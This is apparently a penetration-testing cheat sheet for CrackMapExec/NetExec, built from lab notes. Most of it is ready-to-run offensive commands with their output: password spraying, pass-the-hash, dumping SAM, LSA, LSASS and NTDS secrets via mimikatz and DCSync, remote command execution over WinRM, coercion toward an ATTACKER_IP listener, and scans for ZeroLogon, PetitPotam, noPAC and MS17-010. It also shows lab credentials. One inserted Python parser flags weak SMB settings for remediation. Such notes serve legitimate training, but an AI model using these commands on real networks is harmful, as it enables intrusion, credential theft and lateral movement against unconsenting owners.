CME
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Domain SID
nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
Outdated OS
nxc ldap IP_RANGE -u username -p password -M obsolete
EternalBlue - MS17-010
[Apr 08, 2024 - 02:26:06 (EDT)] exegol-CPTS /workspace # nxc smb "10.129.201.97" -u '' -p '' -M ms17-010
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
SMB 10.129.201.97 445 SHELLS-WINBLUE [*] Windows Server 2016 Standard 14393 x64 (name:SHELLS-WINBLUE) (domain:SHELLS-WINBLUE) (signing:False) (SMBv1:True)
SMB 10.129.201.97 445 SHELLS-WINBLUE [+] SHELLS-WINBLUE\:
MS17-010 [+] 10.129.201.97 is likely VULNERABLE to MS17-010! (Windows Server 2016 Standard 14393)
Printerbug
nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP
Source: https://x.com/al3x_n3ff/status/1770238201598267468
Password policy
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
Password Spraying
SMB Bruteforce
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success
cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB
SMB (445, 139) / RPC
Shares
$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares
SMB 10.129.42.197 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.42.197 445 WINSRV [+] WINSRV\user:password
SMB 10.129.42.197 445 WINSRV [+] Enumerated shares
SMB 10.129.42.197 445 WINSRV Share Permissions Remark
SMB 10.129.42.197 445 WINSRV ----- ----------- ------
SMB 10.129.42.197 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.42.197 445 WINSRV C$ Default share
SMB 10.129.42.197 445 WINSRV SHARENAME READ,WRITE
SMB 10.129.42.197 445 WINSRV IPC$ READ Remote IPC
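The SMB banner lines that nxc/cme print in the MS17-010 and Shares sections above carry the two settings a defender most wants from such a sweep: whether signing is required and whether SMBv1 is still enabled. The parser below is an added example (not part of CrackMapExec or NetExec); the sample lines are constructed in the page's output format and the host/IP values come from the page.

```python
import re

# Constructed sample in the nxc/cme SMB output format shown on this page.
SAMPLE_OUTPUT = """\
SMB 10.129.201.97 445 SHELLS-WINBLUE [*] Windows Server 2016 Standard 14393 x64 (name:SHELLS-WINBLUE) (domain:SHELLS-WINBLUE) (signing:False) (SMBv1:True)
SMB 10.129.42.197 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.42.197 445 WINSRV [+] WINSRV\\user:password
"""

# Only the "[*]" banner line carries the signing/SMBv1 flags; "[+]" auth lines are skipped.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.+?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)\s*$"
)


def parse_banners(text):
    """Return one dict per SMB banner line, with signing/smbv1 as booleans."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["signing"] = d["signing"] == "True"
        d["smbv1"] = d["smbv1"] == "True"
        hosts.append(d)
    return hosts


def weak_hosts(hosts):
    """Map ip -> list of configuration findings to remediate (empty list means none)."""
    findings = {}
    for h in hosts:
        issues = []
        if not h["signing"]:
            issues.append("SMB signing not required (NTLM relay exposure)")
        if h["smbv1"]:
            issues.append("SMBv1 enabled (MS17-010 exposure)")
        if issues:
            findings[h["ip"]] = issues
    return findings


if __name__ == "__main__":
    for ip, issues in weak_hosts(parse_banners(SAMPLE_OUTPUT)).items():
        print(ip, "->", "; ".join(issues))
```

Feed it the saved stdout of a sweep (or the nxc log files) and the result is a per-host remediation list rather than a wall of banner lines.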
Users List
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
Logged-on users
$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Autologon users
nxc smb IP -u username -p password -M reg-winlogon
Source: https://x.com/al3x_n3ff/status/1774787873104900448
Group Password Policy - GPP
nxc smb 10.129.202.85 -u jmarston -p 'P@ssword!' -M gpp_password
$ crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found SYSVOL share
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Searching for Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk']
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL']
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!']
Dump SAM
SAM & LSA secrets
You need at least local administrator privileges on the remote target; use the --local-auth option if your user is a local account.
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
Dump LSA
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
If you find an account whose name starts with _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_, you can recover the account behind it:
nxc ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c5<---SNIP--->cd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000'
Dump LSASS secrets
LSASS secrets
nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz
nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"'
SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
Dump NTDS
NTDS secrets
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil
Pass the Hash (PtH)
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
WinRM
WinRM (5985, 5986)
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Command Execution
[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin)
WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell)
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Directory: C:\
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name
WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ----
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs
WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files
WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86)
WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows
WINRM 10.129.202.136 5985 WINSRV
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #
SSH
SSH (22)
nxc ssh 10.129.245.201 -u sam -p mut_password.list
LDAP - Users
To enumerate all users via LDAP:
nxc ldap $ip -u $user -p $password --users
To enumerate just the active users via LDAP:
nxc ldap $ip -u $user -p $password --active-users
Scan for vulnerabilities
Windows Exploit
Scan for multiple vulns
nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare -M shadowcoerce -M petitpotam
ZeroLogon
nxc smb <ip> -u '' -p '' -M zerologon
PetitPotam
nxc smb <ip> -u '' -p '' -M petitpotam
noPAC
nxc smb <ip> -u 'user' -p 'pass' -M nopac